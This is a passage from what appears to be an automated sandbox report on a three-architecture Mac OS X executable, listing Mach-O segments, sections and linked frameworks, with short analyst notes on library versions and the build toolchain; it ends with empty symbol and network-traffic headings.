  section __const: addr 78528, size 36, offset 74432, align 2, reloff 0, nreloc 0, flags 0, reserved1 0, reserved2 0
  section __cfstring: addr 78564, size 32, offset 74468, align 2, reloff 0, nreloc 0, flags 0, reserved1 0, reserved2 0
  section __data: addr 78596, size 19748, offset 74500, align 2, reloff 0, nreloc 0, flags 0, reserved1 0, reserved2 0
  section __common: addr 98344, size 388, offset 0, align 2, reloff 0, nreloc 0, flags 1, reserved1 0, reserved2 0
  section __bss: addr 98732, size 24, offset 0, align 2, reloff 0, nreloc 0, flags 1, reserved1 0, reserved2 0
segment_command __OBJC: vmaddr 102400, vmsize 4096, fileoff 98304, filesize 4096, maxprot 7, initprot 3, nsects 4, flags 0
  section __message_refs: addr 102400, size 116, offset 98304, align 2, reloff 0, nreloc 0, flags 5, reserved1 0, reserved2 0
  section __cls_refs: addr 102516, size 48, offset 98420, align 2, reloff 0, nreloc 0, flags 5, reserved1 0, reserved2 0
  section __module_info: addr 102564, size 32, offset 98468, align 2, reloff 0, nreloc 0, flags 0, reserved1 0, reserved2 0
  section __image_info: addr 102596, size 8, offset 98500, align 2, reloff 0, nreloc 0, flags 0, reserved1 0, reserved2 0
segment_command __LINKEDIT: vmaddr 106496, vmsize 5884, fileoff 102400, filesize 5884, maxprot 7, initprot 1, nsects 0, flags 0

symtab_command: symoff 102400, nsyms 154, stroff 105460, strsize 2824
dysymtab_command: ilocalsym 0, nlocalsym 1, iextdefsym 1, nextdefsym 3, iundefsym 4, nundefsym 150, tocoff 0, ntoc 0, modtaboff 0, nmodtab 0, extrefsymoff 0, nextrefsyms 0, indirectsymoff 104280, nindirectsyms 295, extreloff 104248, nextrel 4, locreloff 0, nlocrel 0
dylinker_command: name offset 12, /usr/lib/dyld
uuid_command: uuid I!2tb }#!K (the report rendered the 16 raw bytes as text)

dylib_command entries (every entry has name offset 24 and timestamp Thu Jan 01 01:00:02 1970):
  /System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation: compatibility_version 150.0.0, current_version 476.19.0
  /System/Library/Frameworks/Foundation.framework/Versions/C/Foundation: compatibility_version 300.0.0, current_version 677.26.0
  /System/Library/Frameworks/AppKit.framework/Versions/C/AppKit: compatibility_version 45.0.0, current_version 949.54.0
  /System/Library/Frameworks/SecurityFoundation.framework/Versions/A/SecurityFoundation: compatibility_version 1.0.0, current_version 36131.0.0
  /System/Library/Frameworks/SystemConfiguration.framework/Versions/A/SystemConfiguration: compatibility_version 1.0.0, current_version 212.2.0
  /System/Library/PrivateFrameworks/Admin.framework/Versions/A/Admin: compatibility_version 1.0.0, current_version 1.0.0
  /usr/lib/libstdc++.6.dylib: compatibility_version 7.0.0, current_version 7.4.0
  /usr/lib/libgcc_s.1.dylib: compatibility_version 1.0.0, current_version 1.0.0
  /usr/lib/libSystem.B.dylib: compatibility_version 1.0.0, current_version 111.1.4
  /System/Library/Frameworks/CoreServices.framework/Versions/A/CoreServices: compatibility_version 1.0.0, current_version 32.0.0
  /System/Library/Frameworks/ApplicationServices.framework/Versions/A/ApplicationServices: compatibility_version 1.0.0, current_version 34.0.0

Note: the linked library versions (CoreFoundation 476.19, Foundation 677.26, AppKit 949.54, libSystem 111.1.4) are those of the Mac OS X 10.5 (Leopard) SDK, which together with the PowerPC slice indicates a build toolchain of that era. The private Admin.framework is unusual for user software.

General information for header1 (x86_64 slice)

Endian: < (little-endian)
Size: 64-bit
Architecture: x86_64
Filetype: execute
Nbr. of load commands: 22

segment_command_64 __PAGEZERO: vmaddr 0, vmsize 4294967296 (4 GiB), fileoff 0, filesize 0, maxprot 0, initprot 0, nsects 0, flags 0
segment_command_64 __TEXT: vmaddr 4294967296, vmsize 77824, fileoff 0, filesize 77824, maxprot 7, initprot 5, nsects 8, flags 0
  section __text: addr 4294972128, size 44762, offset 4832, align 2, reloff 0, nreloc 0, flags 2147484672 (0x80000400), reserved1 0, reserved2 0, reserved3 0
  section __symbol_stub1: addr 4295016890, size 756, offset 49594, align 1, reloff 0, nreloc 0, flags 2147484680 (0x80000408), reserved1 0, reserved2 6, reserved3 0
  section __cstring: addr 4295017648, size 3211, offset 50352, align 3, reloff 0, nreloc 0, flags 2, reserved1 0, reserved2 0, reserved3 0
  section __const: addr 4295020864, size 6608, offset 53568, align 5, reloff 0, nreloc 0, flags 0, reserved1 0, reserved2 0, reserved3 0
  section __stub_helper: addr 4295027472, size 2278, offset 60176, align 0, reloff 0, nreloc 0, flags 2147484672 (0x80000400), reserved1 0, reserved2 0, reserved3 0
  section __gcc_except_tab: addr 4295029752, size 4117, offset 62456, align 2, reloff 0, nreloc 0, flags 0, reserved1 0, reserved2 0, reserved3 0
  section __unwind_info: addr 4295033872, size 836, offset 66576, align 4, reloff 0, nreloc 0, flags 0, reserved1 0, reserved2 0, reserved3 0
  section __eh_frame: addr 4295034712, size 10392, offset 67416, align 3, reloff 0, nreloc 0, flags 1610612747 (0x6000000b), reserved1 0, reserved2 0, reserved3 0
segment_command_64 __DATA: vmaddr 4295045120, vmsize 24576, fileoff 77824, filesize 24576, maxprot 7, initprot 3, nsects 10, flags 0
  section __dyld: addr 4295045120, size 56, offset 77824, align 3, reloff 0, nreloc 0, flags 0, reserved1 0, reserved2 0, reserved3 0
  section __nl_symbol_ptr: addr 4295045176, size 104, offset 77880, align 2, reloff 0, nreloc 0, flags 6, reserved1 126, reserved2 0, reserved3 0
  section __la_symbol_ptr: addr 4295045280, size 1008, offset 77984, align 2, reloff 0, nreloc 0, flags 7, reserved1 139, reserved2 0, reserved3 0
  section __const: addr 4295046288, size 16, offset 78992, align 4, reloff 0, nreloc 0, flags 0, reserved1 0, reserved2 0, reserved3 0
  section __cfstring: addr 4295046304, size 64, offset 79008, align 3, reloff 0, nreloc 0, flags 0, reserved1 0, reserved2 0, reserved3 0
  section __objc_msgrefs: addr 4295046368, size 464, offset 79072, align 3, reloff 0, nreloc 0, flags 0, reserved1 0, reserved2 0, reserved3 0
  section __objc_classrefs: addr 4295046832, size 96, offset 79536, align 3, reloff 0, nreloc 0, flags 0, reserved1 0, reserved2 0, reserved3 0
  section __objc_imageinfo: addr 4295046928, size 8, offset 79632, align 2, reloff 0, nreloc 0, flags 0, reserved1 0, reserved2 0, reserved3 0
  section __data: addr 4295046944, size 19920, offset 79648, align 5, reloff 0, nreloc 0, flags 0, reserved1 0, reserved2 0, reserved3 0
  section __common: addr 4295066880, size 480, offset 0, align 5, reloff 0, nreloc 0, flags 1, reserved1 0, reserved2 0, reserved3 0
segment_command_64 __LINKEDIT: vmaddr 4295069696, vmsize 10408, fileoff 102400, filesize 10408, maxprot 7, initprot 1, nsects 0, flags 0

dyld_info_command: rebase_off 0, rebase_size 0, bind_off 102400, bind_size 960, weak_bind_off 103360, weak_bind_size 104, lazy_bind_off 103464, lazy_bind_size 2632, export_off 106096, export_size 168
symtab_command: symoff 106264, nsyms 156, stroff 110184, strsize 2624
dysymtab_command: ilocalsym 0, nlocalsym 1, iextdefsym 1, nextdefsym 3, iundefsym 4, nundefsym 152, tocoff 0, ntoc 0, modtaboff 0, nmodtab 0, extrefsymoff 0, nextrefsyms 0, indirectsymoff 109120, nindirectsyms 265, extreloff 108760, nextrel 45, locreloff 0, nlocrel 0
dylinker_command: name offset 12, /usr/lib/dyld
uuid_command: uuid ]UC\ur0EH (the report rendered the 16 raw bytes as text)

dylib_command entries (every entry has name offset 24 and timestamp Thu Jan 01 01:00:02 1970), versions as rendered by the report:
  /System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation: compatibility_version 0.150.0, current_version 4864.220.1
  /System/Library/Frameworks/Foundation.framework/Versions/C/Foundation: compatibility_version 0.44.1, current_version 6656.165.2
  /System/Library/Frameworks/AppKit.framework/Versions/C/AppKit: compatibility_version 0.45.0, current_version 13824.181.3
  /System/Library/Frameworks/SecurityFoundation.framework/Versions/A/SecurityFoundation: compatibility_version 0.1.0, current_version 0.35.141
  /System/Library/Frameworks/SystemConfiguration.framework/Versions/A/SystemConfiguration: compatibility_version 0.1.0, current_version 512.212.0
  /System/Library/PrivateFrameworks/Admin.framework/Versions/A/Admin: compatibility_version 0.1.0, current_version 0.1.0
  /usr/lib/libstdc++.6.dylib: compatibility_version 0.7.0, current_version 1024.7.0
  /usr/lib/libgcc_s.1.dylib: compatibility_version 0.1.0, current_version 0.1.0
  /usr/lib/libSystem.B.dylib: compatibility_version 0.1.0, current_version 260.111.0
  /usr/lib/libobjc.A.dylib: compatibility_version 0.1.0, current_version 0.227.0
  /System/Library/Frameworks/CoreServices.framework/Versions/A/CoreServices: compatibility_version 0.1.0, current_version 0.32.0
  /System/Library/Frameworks/ApplicationServices.framework/Versions/A/ApplicationServices: compatibility_version 0.1.0, current_version 0.34.0

Note: the report's parser read the 32-bit version fields of this little-endian slice byte-swapped. Decoding them gives the same values as header0 (0.150.0 and 4864.220.1 are compatibility 150.0.0 and current 476.19.0 for CoreFoundation; 260.111.0 is libSystem 111.1.4; 0.35.141 is SecurityFoundation 36131.0.0), and the extra libobjc.A.dylib entry 0.227.0 is 227.0.0. The only real difference from header0 is the added libobjc.A.dylib dependency and the dyld_info_command, which account for the 22nd load command.

General information for header2 (i386 slice)

Endian: < (little-endian)
Size: 32-bit
Architecture: i386
Filetype: execute
Nbr. of load commands: 23

segment_command __PAGEZERO: vmaddr 0, vmsize 4096, fileoff 0, filesize 0, maxprot 0, initprot 0, nsects 0, flags 0
segment_command __TEXT: vmaddr 4096, vmsize 77824, fileoff 0, filesize 77824, maxprot 7, initprot 5, nsects 8, flags 0
  section __text: addr 11084, size 46717, offset 6988, align 2, reloff 0, nreloc 0, flags 2147484672 (0x80000400), reserved1 0, reserved2 0
  section __cstring: addr 57804, size 3347, offset 53708, align 2, reloff 0, nreloc 0, flags 2, reserved1 0, reserved2 0
  section __const: addr 61152, size 7632, offset 57056, align 5, reloff 0, nreloc 0, flags 0, reserved1 0, reserved2 0
  section __symbol_stub: addr 68784, size 756, offset 64688, align 1, reloff 0, nreloc 0, flags 2147484680 (0x80000408), reserved1 0, reserved2 6
  section __stub_helper: addr 69540, size 2028, offset 65444, align 0, reloff 0, nreloc 0, flags 2147484672 (0x80000400), reserved1 0, reserved2 0
  section __gcc_except_tab: addr 71568, size 4117, offset 67472, align 2, reloff 0, nreloc 0, flags 0, reserved1 0, reserved2 0
  section __unwind_info: addr 75696, size 752, offset 71600, align 4, reloff 0, nreloc 0, flags 0, reserved1 0, reserved2 0
  section __eh_frame: addr 76448, size 5448, offset 72352, align 2, reloff 0, nreloc 0, flags 1610612747 (0x6000000b), reserved1 0, reserved2 0
segment_command __DATA: vmaddr 81920, vmsize 24576, fileoff 77824, filesize 24576, maxprot 7, initprot 3, nsects 8, flags 0
  section __dyld: addr 81920, size 28, offset 77824, align 2, reloff 0, nreloc 0, flags 0, reserved1 0, reserved2 0
  section __nl_symbol_ptr: addr 81948, size 180, offset 77852, align 2, reloff 0, nreloc 0, flags 6, reserved1 126, reserved2 0
  section __la_symbol_ptr: addr 82128, size 504, offset 78032, align 2, reloff 0, nreloc 0, flags 7, reserved1 171, reserved2 0
  section __const: addr 82632, size 8, offset 78536, align 2, reloff 0, nreloc 0, flags 0, reserved1 0, reserved2 0
  section __cfstring: addr 82640, size 32, offset 78544, align 2, reloff 0, nreloc 0, flags 0, reserved1 0, reserved2 0
  section __data: addr 82688, size 19920, offset 78592, align 5, reloff 0, nreloc 0, flags 0, reserved1 0, reserved2 0
  section __common: addr 102624, size 428, offset 0, align 5, reloff 0, nreloc 0, flags 1, reserved1 0, reserved2 0
  section __bss: addr 103052, size 24, offset 0, align 2, reloff 0, nreloc 0, flags 1, reserved1 0, reserved2 0
segment_command __OBJC: vmaddr 106496, vmsize 4096, fileoff 102400, filesize 4096, maxprot 7, initprot 3, nsects 4, flags 0
  section __message_refs: addr 106496, size 116, offset 102400, align 2, reloff 0, nreloc 0, flags 5, reserved1 0, reserved2 0
  section __cls_refs: addr 106612, size 48, offset 102516, align 2, reloff 0, nreloc 0, flags 5, reserved1 0, reserved2 0
  section __module_info: addr 106660, size 32, offset 102564, align 2, reloff 0, nreloc 0, flags 0, reserved1 0, reserved2 0
  section __image_info: addr 106692, size 8, offset 102596, align 2, reloff 0, nreloc 0, flags 0, reserved1 0, reserved2 0
segment_command __LINKEDIT: vmaddr 110592, vmsize 9488, fileoff 106496, filesize 9488, maxprot 7, initprot 1, nsects 0, flags 0

dyld_info_command: rebase_off 0, rebase_size 0, bind_off 106496, bind_size 524, weak_bind_off 107020, weak_bind_size 100, lazy_bind_off 107120, lazy_bind_size 2808, export_off 109928, export_size 164
symtab_command: symoff 110092, nsyms 155, stroff 113172, strsize 2812
dysymtab_command: ilocalsym 0, nlocalsym 1, iextdefsym 1, nextdefsym 3, iundefsym 4, nundefsym 151, tocoff 0, ntoc 0, modtaboff 0, nmodtab 0, extrefsymoff 0, nextrefsyms 0, indirectsymoff 111984, nindirectsyms 297, extreloff 111952, nextrel 4, locreloff 0, nlocrel 0
dylinker_command: name offset 12, /usr/lib/dyld
uuid_command: uuid gL6T\6.FW (the report rendered the 16 raw bytes as text)

dylib_command entries (every entry has name offset 24 and timestamp Thu Jan 01 01:00:02 1970), versions as rendered by the report:
  /System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation: compatibility_version 0.150.0, current_version 4864.220.1
  /System/Library/Frameworks/Foundation.framework/Versions/C/Foundation: compatibility_version 0.44.1, current_version 6656.165.2
  /System/Library/Frameworks/AppKit.framework/Versions/C/AppKit: compatibility_version 0.45.0, current_version 13824.181.3
  /System/Library/Frameworks/SecurityFoundation.framework/Versions/A/SecurityFoundation: compatibility_version 0.1.0, current_version 0.35.141
  /System/Library/Frameworks/SystemConfiguration.framework/Versions/A/SystemConfiguration: compatibility_version 0.1.0, current_version 512.212.0
  /System/Library/PrivateFrameworks/Admin.framework/Versions/A/Admin: compatibility_version 0.1.0, current_version 0.1.0
  /usr/lib/libstdc++.6.dylib: compatibility_version 0.7.0, current_version 1024.7.0
  /usr/lib/libgcc_s.1.dylib: compatibility_version 0.1.0, current_version 0.1.0
  /usr/lib/libSystem.B.dylib: compatibility_version 0.1.0, current_version 260.111.0
  /usr/lib/libobjc.A.dylib: compatibility_version 0.1.0, current_version 0.227.0
  /System/Library/Frameworks/CoreServices.framework/Versions/A/CoreServices: compatibility_version 0.1.0, current_version 0.32.0
  /System/Library/Frameworks/ApplicationServices.framework/Versions/A/ApplicationServices: compatibility_version 0.1.0, current_version 0.34.0

Note: as for header1, the report's parser read the version fields of this little-endian slice byte-swapped; decoded, they are the same Mac OS X 10.5 SDK versions shown for header0 (0.150.0 / 4864.220.1 is CoreFoundation 150.0.0 / 476.19.0, 260.111.0 is libSystem 111.1.4, libobjc.A.dylib 0.227.0 is 227.0.0). The three slices are the same program built for PowerPC, Intel 64-bit and Intel 32-bit, so a fat binary of this shape runs on every Mac from the PowerPC era through the analysis system's Lion.

Symbols

Symbol

Network Behavior

TCP Packets

Timestamp    Source Port    Dest Port    Source IP    Dest IP